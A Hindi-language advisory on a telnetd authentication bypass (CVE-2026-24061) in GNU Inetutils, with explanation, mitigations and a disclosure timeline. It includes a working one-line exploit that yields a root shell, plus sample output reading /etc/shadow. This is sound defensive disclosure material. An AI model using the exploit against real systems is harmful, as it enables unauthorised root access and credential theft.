
CVE-2026-24061
GNU Inetutils telnetd में गंभीर रिमोट प्रमाणीकरण उल्लंघन
2015 का भूत अब भी उन सबको अपने कब्जे में लेने के लिए लौट आया है जो अब भी टेलनेट चला रहे हैं।
शून्य प्रमाणीकरण। एक एनवायरनमेंट वेरिएबल। तुरंत रूट शेल।
CVE-2026-24061 GNU Inetutils telnetd ≤ 2.7 में एक गंभीर रिमोट विशेषाधिकार वृद्धि भेद्यता है।
एक अप्रमाणित रिमोट हमलावर Telnet NEW-ENVIRON विकल्प के माध्यम से USER एनवायरनमेंट वेरिएबल को "-f root" पर सेट करता है।
telnetd इसे अनसैनिटाइज्ड सीधे /bin/login को भेजता है → login -f root देखता है → सभी प्रमाणीकरण छोड़ता है → हमलावर को रूट शेल में पहुंचा देता है।
यह खतरनाक कोड लगभग 11 वर्षों (लगभग 2015 से) तक ट्री में चुपचाप पड़ा रहा।
“एक env var. कोई पासवर्ड नहीं. पूर्ण रूट. 2026 में आपका स्वागत है।”
मार्च 2026 में वास्तविकता:
जब telnetd को NEW-ENVIRON विकल्प प्राप्त होता है जिसमें शामिल है:
USER=-f root
यह मान को सीधे /bin/login को पारित argv में जोड़ता है:
execve("/bin/login", ["login", "-f", "root", ...], ...)
login बाइनरी -f root को इस प्रकार व्याख्या करता है:
“यह उपयोगकर्ता पहले से ही root के रूप में प्रमाणित है — कोई पासवर्ड जांच की आवश्यकता नहीं।”
→ हमलावर को # प्रॉम्प्ट मिलता है। खेल खत्म।
प्रमुख घातक डिजाइन विकल्प: -R / env var फॉरवर्डिंग को कभी भी अधिकृत उपयोगकर्ताओं तक सीमित नहीं किया गया।
संवेदनशील संस्करण: GNU Inetutils telnetd 1.9.3 – 2.7
2026 में सामान्य लक्ष्य:
सुरक्षित:
एक-लाइनर (कोई भी Linux/macOS जिसमें टेलनेट क्लाइंट हो):
USER="-f root" telnet -a 192.168.1.50
सामान्य आउटपुट:
┌──(attacker㉿kali)-[~]
└─$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.
Debian GNU/Linux 12 telnetd
root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...
एक Enter कुंजी दबाने के बाद — पूर्ण रूट एक्सेस।
telnet localhost 23 # inetutils बैनर देखें
inetutils-telnetd --version # यदि ≤ 2.7 है तो संवेदनशील
systemctl disable --now inetutils-inetd # या telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd
sudo apt update && sudo apt install --reinstall inetutils-telnetd # → ≥2.8
iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp
| दिनांक | घटना |
|---|
| ~मार्च 2015 | संवेदनशील env हैंडलिंग प्रस्तुत की गई |
| जनवरी 2026 | अपस्ट्रीम को निजी रिपोर्ट |
| जनवरी 2026 के अंत | सार्वजनिक खुलासा और CVE असाइनमेंट |
| जनवरी 2026 के अंत | फिक्स जारी (Inetutils ≥ 2.8) |
| 26 जनवरी, 2026 | CISA ज्ञात शोषित भेद्यता सूची में जोड़ा गया |
| फरवरी–मार्च 2026 | लीगेसी/OT सिस्टमों के खिलाफ शोषण में वृद्धि |
| मार्च 2026 | कई एम्बेडेड विक्रेता अब भी चुप या अपैचित |